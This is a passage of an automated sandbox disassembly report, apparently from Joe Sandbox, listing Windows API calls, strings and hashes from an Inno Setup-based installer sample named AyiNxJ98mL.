                                                                • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                              Strings
                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                              • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                              • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                              • API String ID: 1452528299-4018462623
                                                              • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                              • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                              • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                              • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                              • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                              APIs
                                                              • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                              • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                              • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A122A18830$A480
                                                              • String ID:
                                                              • API String ID: 3325508737-0
                                                              • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                              • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                              • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                              • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                              APIs
                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Enum$NameOpenResourceUniversal
                                                              • String ID: Z
                                                              • API String ID: 3604996873-1505515367
                                                              • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                              • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                              • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                              • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 0044D05E
                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DrawText$EmptyRect
                                                              • String ID:
                                                              • API String ID: 182455014-2867612384
                                                              • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                              • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                              • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                              • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                              APIs
                                                              • 73A1A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                              • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                              • 73A1A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A480A570CreateFontIndirectObjectSelect
                                                              • String ID: ...\
                                                              • API String ID: 2998766281-983595016
                                                              • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                              • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                              • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                              • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle
                                                              • String ID: .tmp$_iu
                                                              • API String ID: 3498533004-10593223
                                                              • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                              • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                              • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                              • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                              • RegisterClassA.USER32(?), ref: 004164DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Class$InfoRegisterUnregister
                                                              • String ID: @
                                                              • API String ID: 3749476976-2766056989
                                                              • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                              • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                              • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                              • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$Move
                                                              • String ID: isRS-%.3u.tmp
                                                              • API String ID: 3839737484-3657609586
                                                              • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                              • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                              • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                              • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 1220098344-2970929446
                                                              • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                              • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                              APIs
                                                                • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                              • API String ID: 1312246647-2435364021
                                                              • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                              • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                              • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                              • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                              Strings
                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                              • Failed to create DebugClientWnd, xrefs: 0045700C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                              • API String ID: 3850602802-3720027226
                                                              • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                              • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                              • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                              • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                              • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                              • String ID: D$x^I
                                                              • API String ID: 3798668922-903578107
                                                              • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                              • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                              • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                              • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                              APIs
                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                              • GetFocus.USER32 ref: 00478673
                                                              • GetKeyState.USER32(0000007A), ref: 00478685
                                                              • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FocusMessageStateTextWaitWindow
                                                              • String ID: Wnd=$%x
                                                              • API String ID: 1381870634-2927251529
                                                              • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                              • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                              • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                              • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                              APIs
                                                              • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Time$File$LocalSystem
                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                              • API String ID: 1748579591-1013271723
                                                              • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                              • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                              • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                              • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                              APIs
                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                              • String ID: DeleteFile$MoveFile
                                                              • API String ID: 3024442154-139070271
                                                              • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                              • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                              • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
